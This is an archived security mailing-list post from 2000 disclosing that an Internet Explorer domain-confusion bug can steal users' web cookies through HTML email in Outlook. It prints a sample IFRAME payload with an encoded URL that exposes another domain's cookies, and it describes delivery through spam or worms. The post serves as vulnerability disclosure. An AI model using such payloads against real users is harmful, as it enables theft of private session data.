|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: IE Domain Confusion Vulnerability is an Email problem also
From: Richard M. Smith (rms2000
BELLATLANTIC.NET)Date: Fri May 12 2000 - 07:33:48 CDT
- Next message: Ultor: "Overflow in Outlook Express 4.* - too long filenames with graphic format extension"
- Previous message: Geo.: "NTMail Proxy Exploit"
- In reply to: Foo Bar: "IE Domain Confusion Vulnerability"
- Next in thread: Marc Slemko: "Re: IE Domain Confusion Vulnerability doesn't matter much"
- Reply: Richard M. Smith: "IE Domain Confusion Vulnerability is an Email problem also"
- Reply: Marc Slemko: "Re: IE Domain Confusion Vulnerability doesn't matter much"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
This same IE bug can also be exploited from an HTML Email
message in Outlook and Outlook Express. The trick is
to put the magic URL in an HTML IFRAME tag. Example:
<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>
A malicious Email message could include many IFRAMEs
to grab cookies from different domains. The cookies
are stolen when the message is read.
Using an Email message, an attack can be directed
at a particular person or a group of people without
them every going to a Web site. The exploit could
also be included in a spam Email message or in the
payload of an Email worm/virus.
I suspect that the same trick works in newsgroup messages,
but I haven't had the time to run the experiment.
This is a pretty bad bug. People's private data at
Web sites is at risk here.
Richard
==========================================
Richard M. Smith
Internet consultant
Email: rms2000bellatlantic.net
http://www.tiac.net/users/smiths
==========================================
- Next message: Ultor: "Overflow in Outlook Express 4.* - too long filenames with graphic format extension"
- Previous message: Geo.: "NTMail Proxy Exploit"
- In reply to: Foo Bar: "IE Domain Confusion Vulnerability"
- Next in thread: Marc Slemko: "Re: IE Domain Confusion Vulnerability doesn't matter much"
- Reply: Richard M. Smith: "IE Domain Confusion Vulnerability is an Email problem also"
- Reply: Marc Slemko: "Re: IE Domain Confusion Vulnerability doesn't matter much"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]